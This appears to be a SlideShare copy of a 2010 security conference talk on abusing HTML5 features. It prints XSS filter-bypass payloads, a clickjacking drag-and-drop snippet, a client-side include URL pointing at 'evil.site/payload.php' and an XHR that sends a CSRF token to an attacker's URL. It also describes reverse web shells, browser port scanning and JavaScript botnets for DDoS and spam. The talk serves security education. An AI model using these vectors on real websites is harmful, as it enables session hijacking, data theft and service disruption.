SlideShare a Scribd company logo
1 of 58
Download to read offline
ATTACK & DEFENSE
                               labs




Attacking with HTML5
Lavakumar Kuppan
Who am I ?

• Web Security Researcher 
• ½ of Attack and Defense Labs, www.andlabs.org
• Penetration Tester @ really big bank
• Author of Imposter & Shell of the Future
• Likes HTML5
   @lavakumark
Disclaimer:
    Views expressed in this talk are my own and does not necessarily reflect 
    those of my employer
                                                            ATTACK & DEFENSE
ClubHack 2010                          2                                 labs
What to Expect?

•   Introduction to HTML5
•   Attacking ‘HTML4’ websites with HTML5
•   Network Reconnaissance with HTML5
•   HTML5 Botnets
•   Tool Releases:
     – Ravan – JavaScript Distributed Password Cracker
     – JSRecon – HTML5 based JavaScript port/network scanner



                                               ATTACK & DEFENSE
ClubHack 2010                  3                          labs
Let’s talk HTML5




ClubHack 2010          4
What is HTML5

•   Next major version of HTML
•   Adds new tags, event handlers to HTML
•   Adds new APIs to call from JavaScript
•   Native support for features currently provided by 
    plug‐ins like Flash/Silverlight/Java




                                            ATTACK & DEFENSE
ClubHack 2010                5                         labs
There is some HTML5 in all of us

• HTML5 is already here
• Many features supported by latest versions of 
  FireFox, Chrome, Safari and Opera.
• IE is slowly getting there with IE9 Beta
• Unless you are trying very hard, you most definitely 
  would have some HTML5 in you(r machine)




                                          ATTACK & DEFENSE
ClubHack 2010              6                         labs
Is HTML5 hopelessly insecure?

• Short answer ‐ NO.
• Long answer
     – Security has been a major consideration in the design of 
       the specification
     – But it is incredibly hard to add features in any technology 
       without increasing the possibility of abuse

     This talk is about the abuse of some of HTML5’s features



                                                    ATTACK & DEFENSE
ClubHack 2010                     7                            labs
HTML5 Features featured in this talk

•   New Tags and Attributes
•   Cross Origin Requests
•   Drag‐n‐Drop API
•   Application Cache
•   WebSockets
•   WebWorkers



                                  ATTACK & DEFENSE
ClubHack 2010                 8              labs
Cross‐site Scripting via HTML5




ClubHack 2010       9
Black‐list XSS filters

• Filters are a popular way to prevent XSS attacks when 
  encoding is not possible ‐ accepting rich content 
  from users
• White‐list filters like AntiSamy exist for this reason
• But developers like developing…..custom filters
• Almost all these filters are black‐list based
• Ofcourse we know that black‐list filters fail
• But ‘we’ are only about 0.1 % of the web community

                                          ATTACK & DEFENSE
ClubHack 2010              10                        labs
Bypassing Black‐list filters with HTML5 ‐ 1

• Filter blocks tags like ‘<script’, ‘<img’ etc 
• HTML5 introduces new tags that can execute scripts 
  ☺
• New tags == bypass outdated black‐lists ☺
Eg:
  <video onerror="javascript:alert(1)"><source>
  <audio onerror="javascript:alert(1)"><source>


                                        ATTACK & DEFENSE
ClubHack 2010             11                       labs
Bypassing Black‐list filters with HTML5 ‐ 2

• Filter blocks ‘<‘ and ‘>’, so tags cannot be injected 
• But user input is being injected inside an elements’s
  attribute ☺
• Filter also blocks event attributes like onerror, onload
  etc 
• HTML5 adds new event attributes  filter bypass ☺
Eg: 
<form id=test onforminput=alert(1)> <input> </form> 
<button form=test onformchange=alert(2)>X
                                            ATTACK & DEFENSE
ClubHack 2010               12                         labs
Bypassing Black‐list filters with HTML5 ‐ 3

• Similar to case ‐2
• But filter is blocking event attributes with regex
  ‘onw+=‘.
• This blocks the HTML5 attributes shown earlier 
• HTML5’s ‘formaction’ event attribute can bypass this 
  filter ☺
Eg: 
  <form id="test" /><button form="test“ 
  formaction="javascript:alert(1)">X
                                         ATTACK & DEFENSE
ClubHack 2010              13                       labs
Self‐triggering XSS exploits with HTML5

• A common XSS occurrence is injection inside some 
   attribute of INPUT tags.
• Current techniques require user interaction to trigger 
   this XSS
 <input type="text" value="‐>Injecting here" 
   onmouseover="alert('Injected val')">
• HTML5 turns this in to self‐triggering XSS
<input type="text" value="‐‐>Injecting here" 
   onfocus="alert('Injected value')" autofocus>
                                          ATTACK & DEFENSE
ClubHack 2010              14                        labs
HTML5 Security CheatSheet

• Updated list of all HTML5 XSS vectors
• Maintained by Mario Heiderich
• All vectors discussed so far are from this list

Front end : http://heideri.ch/jso/#html5

Back end: http://code.google.com/p/html5security/


                                             ATTACK & DEFENSE
ClubHack 2010                15                         labs
Demo




                     ATTACK & DEFENSE
ClubHack 2010   16              labs
Reverse Web Shells with COR




ClubHack 2010       17
Cross Origin Request (COR)

• Originally Ajax calls were subject to Same Origin 
  Policy
• Site A cannot make XMLHttpRequests to Site B
• HTML5 makes it possible to make these cross domain 
  calls
• Site A can now make XMLHttpRequests to Site B as 
  long as Site B allows it.
• Response from Site B should include a header:
  Access‐Control‐Allow‐Origin: Site A
                                       ATTACK & DEFENSE
ClubHack 2010            18                       labs
Reverse Web Shell

• This feature can be abused to set up a Reverse Web 
  Shell
• Say vuln.site is vulnerable to XSS and an attacker 
  injects his payload in the victim’s browser
• This payload can now make cross domain calls to 
  attacker.site and read the response 
• This sets up a communication channel between the 
  attacker and victim
• Attacker can access vuln.site from victim’s browser 
  by using this channel                    ATTACK & DEFENSE
ClubHack 2010                19                        labs
HTML5 Advantage

• This attack was possible even without HTML5
• Tools like XSS Shell and XSS Proxy implemented them
• But they relied on hacks for cross domain 
  communication
• This made them less reliable with poor performance
• HTML5, with native support for cross domain 
  communication takes this attack to whole another 
  level

                                        ATTACK & DEFENSE
ClubHack 2010             20                       labs
Shell of the Future

• Tool to automate the process of creating and 
  accessing a Reverse Web Shell
• Tunnels the attacker’s HTTP traffic over COR from the 
  victim’s browser
• Attacker can browse the victim’s session from his 
  browser.
• Can get around Session Hijacking countermeasure 
  like Http‐Only and IP Address–Session ID binding
• Comes loaded with two default JavaScript exploits
• Supports HTTPS website as well           ATTACK & DEFENSE
ClubHack 2010               21                       labs
Shell of the Future’s Architecture




                                     ATTACK & DEFENSE
ClubHack 2010          22                       labs
Demo




                     ATTACK & DEFENSE
ClubHack 2010   23              labs
Clickjacking with HTML5




ClubHack 2010              24
Text‐field Injection using Drag and Drop API

• Filling forms across domains is usually difficult in 
  Clickjacking attacks
• HTML5’s Drag and Drop API makes this easy
• Attacker convinces the victim to perform a Drag and 
  Drop operation
• A simple game can be convincing here
• By using frame overlays, this action can fill forms 
  across domains
• Introduced by Paul Stone at BlackHat Europe 2010
                                          ATTACK & DEFENSE
ClubHack 2010              25                        labs
How it works

• Attacker.site would contain and element like this:
  <div draggable="true" 
  ondragstart="event.dataTransfer.setData('text/plain', 
  'Evil data')“><h3>DRAG ME!!</h3></div>
• When the victim starts dragging this, the event’s data 
  value is set to ‘Evil Data’
• Victim drops the element on to an text field inside an 
  invisible iframe
• That field is populated with the value ‘Evil Data’.
                                          ATTACK & DEFENSE
ClubHack 2010              26                        labs
IFRAME Sandboxing

• HTML5 adds Sandbox attribute to the IFRAME tag
• Can be used to disable JavaScript in the Iframe.
• Many websites rely solely on frame busting for 
  Clickjacking protection
• If such sites are included inside an Sandboxed Iframe, 
  frame busting is disabled

<iframe src="http://www.victim.site" sandbox></iframe>


                                              ATTACK & DEFENSE
ClubHack 2010                 27                         labs
Demo




                     ATTACK & DEFENSE
ClubHack 2010   28              labs
HTML5 Cache Poisoning




ClubHack 2010             29
Poisoning HTML5 Application Cache

• Application Cache has longer life than regular cache
• Must be deleted explicitly in Firefox but it asks for 
  user approval before setting this cache
• Chrome and Safari do not ask for user approval but 
  deleting regular cache also deletes this cache
• For a regular cache, refreshing the page would 
  update it but Application Cache would still retain the 
  poisoned content
• Imposter has a module to poison Application Cache
                                           ATTACK & DEFENSE
ClubHack 2010              30                         labs
Demo




                     ATTACK & DEFENSE
ClubHack 2010   31              labs
Client‐side RFI




ClubHack 2010          32
Client‐side File Includes

• Have you seen URLs like these:
    http://www.example.com/#index.php
• Inside the page:
    <html><body><script>
    x = new XMLHttpRequest();
    x.open("GET",location.hash.substring(1));
    x.onreadystatechange=function(){if(x.readyState==4){
    document.getElementById("main").innerHTML=x.responseText;}}
    x.send();
    </script>
    <div id=“main”></div>
    </body></html>
                                                      ATTACK & DEFENSE
ClubHack 2010                      33                             labs
The Cross Origin Request effect 

• This design though flawed was difficult to exploit 
  earlier
• Introducing Cross Origin Requests
  http://example.com/#http://evil.site/payload.php
• Contents of ‘payload.php’ will be included as HTML 
  within <div id=“main”></div>
• New type of XSS!!
• Discovered by Matt Austin on touch.facebook.com 
  and a bunch of other sites
                                         ATTACK & DEFENSE
ClubHack 2010             34                        labs
XMLHttpRequest as a sink

• COR makes XMLHttpRequest as a dangerous DOM 
  based XSS sink
• Responses of XHR are consumed in many websites in 
  different ways.
  Eg: JSON, XML HTML
• Since this data is supposed to be from same domain 
  they are usually not validated
• Huge potential for XSS vulnerabilities

                                        ATTACK & DEFENSE
ClubHack 2010            35                        labs
Demo




                     ATTACK & DEFENSE
ClubHack 2010
                36              labs
Cross‐site Posting




ClubHack 2010           37
Reverse of Client‐side RFI

• Here the focus is not on the response of XHR
• But instead it is the request that matters
• Sites send a lot of sensitive data to the server using 
  XHR
• If the URL of the XHR is made to point to the 
  attacker’s website, then this data is sent to attacker’s 
  server
    Eg: x = new XMLHttpRequest();
        x.open(“POST",location.hash.substring(1));
        x.send(“a=1&b=2&csrf‐token=k34wo9s3l”);  ATTACK & DEFENSE
ClubHack 2010                    38                          labs
Network Reconnaissance




ClubHack 2010             39
Port Scanning

• COR and WebSockets can be used for performing 
  reliable port scans
• The time it takes to change its readystate status 
  indicates the status of the port it is connecting to
     – XHR  depends on time spent in ReadyState 1
     – WebSockets  depends on time spent in ReadyState 0
• Possible to identify open, closed and filtered ports
• Scans are subject to the port blocking employed in all 
  popular browser
                                             ATTACK & DEFENSE
ClubHack 2010                 40                        labs
Application‐level scanning

• These are application‐level not socket‐level scans
• The port behavior would depend on the application 
  running on it. Types of applications:
     – Close on connect: Application terminates the connection once 
       connection is established due to protocol mismatch.
     – Respond & close on connect: Similar to type‐1 but sends some default 
       response before closing connection
     – Open with no response: Application keeps the connection open 
       expecting more data or data that would match its protocol 
       specification.
     – Open with response: Similar to type‐3 but sends some default 
       response on connection, like a banner or welcome message
                                                         ATTACK & DEFENSE
ClubHack 2010                        41                              labs
ReadyState time – Port Status mapping




                                 ATTACK & DEFENSE
ClubHack 2010        42                     labs
Network Scanning

• Use the port scanning technique to perform 
  horizontal scans of the network
• Fact that we can detect closed ports makes this ideal
• Scan for port 445, it is usually allowed through 
  personal firewall
     – Windows 7  application type‐1  easily detected
     – Windows XP  application type‐3  cannot be detected
• If port 3389 is also allowed across firewalls but can 
  only be detected if this port is closed on the system 
  (application type ‐3)                     ATTACK & DEFENSE
ClubHack 2010                 43                        labs
Guessing user’s Private IP

• Step 1: Identify the user’s subnet
     – Most home users are on the 192.168.x.x subnet and the 
       router is 192.168.x.1
     – Scanning for port 80 from 192.168.0.1 to 192.168.255.1 
       identifies the user’s subnet
• Step 2: Identify the user’s IP address
     – Scan the subnet for a port filtered by personal firewalls –
       Eg: 601337
     – The only system that would respond is the user’s system, 
       the request does not get filtered by the firewall as it was 
       generated within the same machine
                                                    ATTACK & DEFENSE
ClubHack 2010                     44                           labs
JSRecon

•   Its an online tool to perform port and network scans
•   Uses the techniques discussed earlier
•   http://www.andlabs.org/tools/jsrecon.html
•   DEMO




                                           ATTACK & DEFENSE
ClubHack 2010               45                        labs
HTML5 Botnets




ClubHack 2010         46
HTML5 WebWorkers

• WebWorkers are background JavaScript threads
• Any website can now start a background JS thread 
  and run it for as long as the page is active
• Long running JS code used to hang the UI
• WebWorker solves this problem
• Result:
         Can perform resource intensive operations for extended 
         periods with JavaScript without affecting the user’s 
         browsing experience – read as ‘without user’s knowledge’

                                                  ATTACK & DEFENSE
ClubHack 2010                    47                          labs
Why JavaScript?

• Botnets are attacker’s version of distributed 
  computing, made of large number of nodes 
  executing the attacker’s code
• JavaScript is the easiest form of code to execute in 
  anybody’s system
• We all execute thousands of lines of untrusted 
  JavaScript code in our browsers everyday during our 
  casual browsing sessions
• Platform & OS neutral– One language to rule them all
• Billions of potential nodes (web users) ATTACK & DEFENSE
ClubHack 2010               48                       labs
Building a botnet

• There are two phases involved in building a botnet
• Phases:
     – Reaching out to victims
     – Extending execution lifetime




                                         ATTACK & DEFENSE
ClubHack 2010                   49                  labs
Reaching out to victims

•   Email spam
•   Trending topics on Twitter
•   Persistent XSS on popular websites, forums etc
•   Search Engine Poisoning
•   Compromised websites
    The sole cause of all human misery is the inability of people to sit quietly 
    in their rooms ‐ Blaise Pascal

     The sole cause of all browser attacks is the inability of people to leave a 
    link unclicked ‐ Internet version
                                                               ATTACK & DEFENSE
ClubHack 2010                            50                                 labs
Extending execution lifetime

• Combination of Clickjacking and Tabnabbing
• Clickjacking to send the user to a new tab
• Tabnabbing to disguise our tab as a regular website 
  like Google or Youtube
• An average user has more than a handful of tabs 
  open, our tab could be open for a long time
• Site wide XSS techniques can also be used


                                          ATTACK & DEFENSE
ClubHack 2010              51                        labs
Botnet created, what do we do with them?

We are restricted by the browser’s sandbox, what could 
 we possibly do?

Here are a few things that can be done:
• DDoS attacks
• Email Spam
• Distributed password cracking


                                          ATTACK & DEFENSE
ClubHack 2010              52                        labs
DDoS Attacks

• Application‐level DDoS can bring down even huge 
  sites
• Pick a process intensive request and make it a few 
  thousand times
  Eg: http://target.site.com/search.php?product=%
• HTML5’s COR can make GET requests to any website
• I clocked 10,000 COR requests/minute on my laptop
• 600 nodes  100,000 requests/sec  site DoSed?
• 6000 nodes?? 60000 nodes???
                                        ATTACK & DEFENSE
ClubHack 2010             53                       labs
Email Spam

• Primarily sent using open relay mail servers
• Web equivalent of open relay mail servers:
    http://example.com/feedback.html
    <form method=“GET” action=“feedback.php”>
    <input type=“hidden” name=“to” value=“fb@example.com” />
    From: <input type=“text” name=“from” value=“”/>
    Subject: <input type=“text” name=“subject” value=“”/>
    Comment: <input type=“text” name=“comment” value=“”/></form>
    http://example.com/feedback.php
    <?php  mail($_GET[‘to’],$_GET[‘’subject], $_GET[‘comment’], 
    "From:”. $_GET[‘from’]); ?>
                                                          ATTACK & DEFENSE
ClubHack 2010                        54                              labs
Spam through COR

• If the form is submitted over GET then COR has no 
  problems
• If the form is submitted over POST then it is not 
  possible
• JSP applications can still be affected using HTTP 
  Parameter Pollution
• This attack is possible even without COR
  <img src=“http://example.com/feedback.php?....”
• But COR is the only option from within WebWorkers
                                        ATTACK & DEFENSE
ClubHack 2010
                          55                       labs
Distributed Password Cracking

• JavaScript is generally not considered to be a good 
  platform for password cracking
• But JavaScript engines are becoming faster everyday
• How fast? – it was possible to create 100000 MD5 
  hashes/second in JavaScript on an I5, 4GB system
• This is still 100‐115 times slower than native code’s 
  performance on same machine
• ~110 nodes running JS code == 1 running native code
• What JavaScript lacks in performance, it more than 
  makes up in volume                       ATTACK & DEFENSE
ClubHack 2010               56                        labs
Ravan – Distributed JS Computing  System

• System for legitimate use of password cracking with 
  JavaScript
• Users are asked for permission before starting 
  cracking process in their browser
• Divides the cracking process in to slots and allots 
  them to individual workers
• The entire process is managed by the master, the 
  hash submitters browser
• Supports Salted MD5 and SHA hashes
• DEMO                                      ATTACK & DEFENSE
ClubHack 2010                57                         labs
Q&A


ClubHack 2010    58

More Related Content

What's hot

DevSecCon Singapore 2019: Workshop - Burp extension writing workshop
DevSecCon Singapore 2019: Workshop - Burp extension writing workshopDevSecCon Singapore 2019: Workshop - Burp extension writing workshop
DevSecCon Singapore 2019: Workshop - Burp extension writing workshopDevSecCon
 
[Wroclaw #7] Why So Serial?
[Wroclaw #7] Why So Serial?[Wroclaw #7] Why So Serial?
[Wroclaw #7] Why So Serial?OWASP
 
Security DevOps: Wie Sie in agilen Projekten trotzdem sicher bleiben // JAX 2015
Security DevOps: Wie Sie in agilen Projekten trotzdem sicher bleiben // JAX 2015Security DevOps: Wie Sie in agilen Projekten trotzdem sicher bleiben // JAX 2015
Security DevOps: Wie Sie in agilen Projekten trotzdem sicher bleiben // JAX 2015Christian Schneider
 
Security DevOps - Free pentesters' time to focus on high-hanging fruits // Ha...
Security DevOps - Free pentesters' time to focus on high-hanging fruits // Ha...Security DevOps - Free pentesters' time to focus on high-hanging fruits // Ha...
Security DevOps - Free pentesters' time to focus on high-hanging fruits // Ha...Christian Schneider
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules CoverageSunny Neo
 
Projects Valhalla and Loom at IT Tage 2021
Projects Valhalla and Loom at IT Tage 2021Projects Valhalla and Loom at IT Tage 2021
Projects Valhalla and Loom at IT Tage 2021Vadym Kazulkin
 
[OWASP Poland Day] Application frameworks' vulnerabilities
[OWASP Poland Day] Application frameworks' vulnerabilities[OWASP Poland Day] Application frameworks' vulnerabilities
[OWASP Poland Day] Application frameworks' vulnerabilitiesOWASP
 
Security Testing using ZAP in SFDC
Security Testing using ZAP in SFDCSecurity Testing using ZAP in SFDC
Security Testing using ZAP in SFDCThinqloud
 
Essential security measures in ASP.NET MVC
Essential security measures in ASP.NET MVC Essential security measures in ASP.NET MVC
Essential security measures in ASP.NET MVC Rafał Hryniewski
 
[OWASP Poland Day] A study of Electron security
[OWASP Poland Day] A study of Electron security[OWASP Poland Day] A study of Electron security
[OWASP Poland Day] A study of Electron securityOWASP
 
Authentication Without Authentication
Authentication Without AuthenticationAuthentication Without Authentication
Authentication Without AuthenticationSoluto
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingRana Khalil
 
Hybrid Mobile Development with Apache Cordova and
Hybrid Mobile Development with Apache Cordova and Hybrid Mobile Development with Apache Cordova and
Hybrid Mobile Development with Apache Cordova and Ryan Cuprak
 
BSides Leeds - Performing JavaScript Static Analysis
BSides Leeds -  Performing JavaScript Static AnalysisBSides Leeds -  Performing JavaScript Static Analysis
BSides Leeds - Performing JavaScript Static AnalysisLewis Ardern
 
[Wroclaw #9] The purge - dealing with secrets in Opera Software
[Wroclaw #9] The purge - dealing with secrets in Opera Software[Wroclaw #9] The purge - dealing with secrets in Opera Software
[Wroclaw #9] The purge - dealing with secrets in Opera SoftwareOWASP
 
OWASP London - So you thought you were safe using AngularJS.. Think again!
OWASP London - So you thought you were safe using AngularJS.. Think again!OWASP London - So you thought you were safe using AngularJS.. Think again!
OWASP London - So you thought you were safe using AngularJS.. Think again!Lewis Ardern
 
Secure your web app presentation
Secure your web app presentationSecure your web app presentation
Secure your web app presentationFrans Lytzen
 
[Wroclaw #7] AWS (in)security - the devil is in the detail
[Wroclaw #7] AWS (in)security - the devil is in the detail[Wroclaw #7] AWS (in)security - the devil is in the detail
[Wroclaw #7] AWS (in)security - the devil is in the detailOWASP
 
How To Use Selenium Successfully (Java Edition)
How To Use Selenium Successfully (Java Edition)How To Use Selenium Successfully (Java Edition)
How To Use Selenium Successfully (Java Edition)Dave Haeffner
 

What's hot (20)

DevSecCon Singapore 2019: Workshop - Burp extension writing workshop
DevSecCon Singapore 2019: Workshop - Burp extension writing workshopDevSecCon Singapore 2019: Workshop - Burp extension writing workshop
DevSecCon Singapore 2019: Workshop - Burp extension writing workshop
 
[Wroclaw #7] Why So Serial?
[Wroclaw #7] Why So Serial?[Wroclaw #7] Why So Serial?
[Wroclaw #7] Why So Serial?
 
Security testautomation
Security testautomationSecurity testautomation
Security testautomation
 
Security DevOps: Wie Sie in agilen Projekten trotzdem sicher bleiben // JAX 2015
Security DevOps: Wie Sie in agilen Projekten trotzdem sicher bleiben // JAX 2015Security DevOps: Wie Sie in agilen Projekten trotzdem sicher bleiben // JAX 2015
Security DevOps: Wie Sie in agilen Projekten trotzdem sicher bleiben // JAX 2015
 
Security DevOps - Free pentesters' time to focus on high-hanging fruits // Ha...
Security DevOps - Free pentesters' time to focus on high-hanging fruits // Ha...Security DevOps - Free pentesters' time to focus on high-hanging fruits // Ha...
Security DevOps - Free pentesters' time to focus on high-hanging fruits // Ha...
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules Coverage
 
Projects Valhalla and Loom at IT Tage 2021
Projects Valhalla and Loom at IT Tage 2021Projects Valhalla and Loom at IT Tage 2021
Projects Valhalla and Loom at IT Tage 2021
 
[OWASP Poland Day] Application frameworks' vulnerabilities
[OWASP Poland Day] Application frameworks' vulnerabilities[OWASP Poland Day] Application frameworks' vulnerabilities
[OWASP Poland Day] Application frameworks' vulnerabilities
 
Security Testing using ZAP in SFDC
Security Testing using ZAP in SFDCSecurity Testing using ZAP in SFDC
Security Testing using ZAP in SFDC
 
Essential security measures in ASP.NET MVC
Essential security measures in ASP.NET MVC Essential security measures in ASP.NET MVC
Essential security measures in ASP.NET MVC
 
[OWASP Poland Day] A study of Electron security
[OWASP Poland Day] A study of Electron security[OWASP Poland Day] A study of Electron security
[OWASP Poland Day] A study of Electron security
 
Authentication Without Authentication
Authentication Without AuthenticationAuthentication Without Authentication
Authentication Without Authentication
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
 
Hybrid Mobile Development with Apache Cordova and
Hybrid Mobile Development with Apache Cordova and Hybrid Mobile Development with Apache Cordova and
Hybrid Mobile Development with Apache Cordova and
 
BSides Leeds - Performing JavaScript Static Analysis
BSides Leeds -  Performing JavaScript Static AnalysisBSides Leeds -  Performing JavaScript Static Analysis
BSides Leeds - Performing JavaScript Static Analysis
 
[Wroclaw #9] The purge - dealing with secrets in Opera Software
[Wroclaw #9] The purge - dealing with secrets in Opera Software[Wroclaw #9] The purge - dealing with secrets in Opera Software
[Wroclaw #9] The purge - dealing with secrets in Opera Software
 
OWASP London - So you thought you were safe using AngularJS.. Think again!
OWASP London - So you thought you were safe using AngularJS.. Think again!OWASP London - So you thought you were safe using AngularJS.. Think again!
OWASP London - So you thought you were safe using AngularJS.. Think again!
 
Secure your web app presentation
Secure your web app presentationSecure your web app presentation
Secure your web app presentation
 
[Wroclaw #7] AWS (in)security - the devil is in the detail
[Wroclaw #7] AWS (in)security - the devil is in the detail[Wroclaw #7] AWS (in)security - the devil is in the detail
[Wroclaw #7] AWS (in)security - the devil is in the detail
 
How To Use Selenium Successfully (Java Edition)
How To Use Selenium Successfully (Java Edition)How To Use Selenium Successfully (Java Edition)
How To Use Selenium Successfully (Java Edition)
 

Viewers also liked

Brand New Game
Brand New GameBrand New Game
Brand New GameNIMA
 
2009 Ccim Naiop Industrial Market Report
2009 Ccim Naiop Industrial Market Report2009 Ccim Naiop Industrial Market Report
2009 Ccim Naiop Industrial Market Reportmdbyers
 
Oltersdorf Realty Home Buying Presentation, Leelanau, Grand Traverse, Travers...
Oltersdorf Realty Home Buying Presentation, Leelanau, Grand Traverse, Travers...Oltersdorf Realty Home Buying Presentation, Leelanau, Grand Traverse, Travers...
Oltersdorf Realty Home Buying Presentation, Leelanau, Grand Traverse, Travers...Oltersdorf Realty, LLC
 
Face Of Human Tragedy In Haiti
Face Of Human Tragedy In HaitiFace Of Human Tragedy In Haiti
Face Of Human Tragedy In HaitiBeatrice Watson
 
Tina superbruixa i don quixot de la manxa
Tina superbruixa i don quixot de la manxaTina superbruixa i don quixot de la manxa
Tina superbruixa i don quixot de la manxaantoniadenrabassa
 
Köy Ensti̇tüleri̇ (sesli)
Köy Ensti̇tüleri̇ (sesli)Köy Ensti̇tüleri̇ (sesli)
Köy Ensti̇tüleri̇ (sesli)Raci Göktaş
 
การกำหนดใช้แป้น Insert ในการวาง
การกำหนดใช้แป้น Insert ในการวางการกำหนดใช้แป้น Insert ในการวาง
การกำหนดใช้แป้น Insert ในการวางพัน พัน
 
Segunda conferencia corretiva 31-01-2014
Segunda conferencia corretiva  31-01-2014Segunda conferencia corretiva  31-01-2014
Segunda conferencia corretiva 31-01-2014Leader Nuno Martins
 
Estou Jogando para empresas do mercado brasileiro de games
Estou Jogando para empresas do mercado brasileiro de gamesEstou Jogando para empresas do mercado brasileiro de games
Estou Jogando para empresas do mercado brasileiro de gamesCayo Medeiros
 

Viewers also liked (20)

Bienvenid@s a mi blog!!
Bienvenid@s a mi blog!!Bienvenid@s a mi blog!!
Bienvenid@s a mi blog!!
 
Домоsite
Домоsite Домоsite
Домоsite
 
Brand New Game
Brand New GameBrand New Game
Brand New Game
 
2009 Ccim Naiop Industrial Market Report
2009 Ccim Naiop Industrial Market Report2009 Ccim Naiop Industrial Market Report
2009 Ccim Naiop Industrial Market Report
 
Você Versus Mercado
Você Versus MercadoVocê Versus Mercado
Você Versus Mercado
 
Oltersdorf Realty Home Buying Presentation, Leelanau, Grand Traverse, Travers...
Oltersdorf Realty Home Buying Presentation, Leelanau, Grand Traverse, Travers...Oltersdorf Realty Home Buying Presentation, Leelanau, Grand Traverse, Travers...
Oltersdorf Realty Home Buying Presentation, Leelanau, Grand Traverse, Travers...
 
Appetizer recipes
Appetizer recipes Appetizer recipes
Appetizer recipes
 
фукам
фукамфукам
фукам
 
La pell del lleó
La pell del lleóLa pell del lleó
La pell del lleó
 
Face Of Human Tragedy In Haiti
Face Of Human Tragedy In HaitiFace Of Human Tragedy In Haiti
Face Of Human Tragedy In Haiti
 
Tina superbruixa i don quixot de la manxa
Tina superbruixa i don quixot de la manxaTina superbruixa i don quixot de la manxa
Tina superbruixa i don quixot de la manxa
 
Köy Ensti̇tüleri̇ (sesli)
Köy Ensti̇tüleri̇ (sesli)Köy Ensti̇tüleri̇ (sesli)
Köy Ensti̇tüleri̇ (sesli)
 
การกำหนดใช้แป้น Insert ในการวาง
การกำหนดใช้แป้น Insert ในการวางการกำหนดใช้แป้น Insert ในการวาง
การกำหนดใช้แป้น Insert ในการวาง
 
Konumuz tavuklar
Konumuz tavuklarKonumuz tavuklar
Konumuz tavuklar
 
Segunda conferencia corretiva 31-01-2014
Segunda conferencia corretiva  31-01-2014Segunda conferencia corretiva  31-01-2014
Segunda conferencia corretiva 31-01-2014
 
Estou Jogando para empresas do mercado brasileiro de games
Estou Jogando para empresas do mercado brasileiro de gamesEstou Jogando para empresas do mercado brasileiro de games
Estou Jogando para empresas do mercado brasileiro de games
 
Pedagogicheskiy proekt
Pedagogicheskiy proektPedagogicheskiy proekt
Pedagogicheskiy proekt
 
Marta
MartaMarta
Marta
 
Hort escolar
Hort escolarHort escolar
Hort escolar
 
Maling
MalingMaling
Maling
 

Similar to Attacking with html5(lava kumar)

Html5 Application Security
Html5 Application SecurityHtml5 Application Security
Html5 Application Securitychuckbt
 
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...Felipe Prado
 
External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) Volkan Özçelik
 
Html5 security
Html5 securityHtml5 security
Html5 securityKrishna T
 
Owasp web application security trends
Owasp web application security trendsOwasp web application security trends
Owasp web application security trendsbeched
 
[2.1] Web application Security Trends - Omar Ganiev
[2.1] Web application Security Trends - Omar Ganiev[2.1] Web application Security Trends - Omar Ganiev
[2.1] Web application Security Trends - Omar GanievOWASP Russia
 
External JavaScript Widget Development Best Practices
External JavaScript Widget Development Best PracticesExternal JavaScript Widget Development Best Practices
External JavaScript Widget Development Best PracticesVolkan Özçelik
 
Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012Volkan Özçelik
 
Top 10 HTML5 Features for Oracle Cloud Developers
Top 10 HTML5 Features for Oracle Cloud DevelopersTop 10 HTML5 Features for Oracle Cloud Developers
Top 10 HTML5 Features for Oracle Cloud DevelopersBrian Huff
 
Peter lubbers-html5-offline-web-apps
Peter lubbers-html5-offline-web-appsPeter lubbers-html5-offline-web-apps
Peter lubbers-html5-offline-web-appsSkills Matter
 
Open source security
Open source securityOpen source security
Open source securitylrigknat
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Jim Manico
 
Silverlight vs HTML5 - Lessons learned from the real world...
Silverlight vs HTML5 - Lessons learned from the real world...Silverlight vs HTML5 - Lessons learned from the real world...
Silverlight vs HTML5 - Lessons learned from the real world...Peter Gfader
 
HTML5 Offline Web Applications (Silicon Valley User Group)
HTML5 Offline Web Applications (Silicon Valley User Group)HTML5 Offline Web Applications (Silicon Valley User Group)
HTML5 Offline Web Applications (Silicon Valley User Group)robinzimmermann
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Jeremiah Grossman
 
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfEN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfGiorgiRcheulishvili
 
BeEF_EUSecWest-2012_Michele-Orru
BeEF_EUSecWest-2012_Michele-OrruBeEF_EUSecWest-2012_Michele-Orru
BeEF_EUSecWest-2012_Michele-OrruMichele Orru
 
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Divyanshu
 

Similar to Attacking with html5(lava kumar) (20)

Html5 Application Security
Html5 Application SecurityHtml5 Application Security
Html5 Application Security
 
Attack with-html5
Attack with-html5Attack with-html5
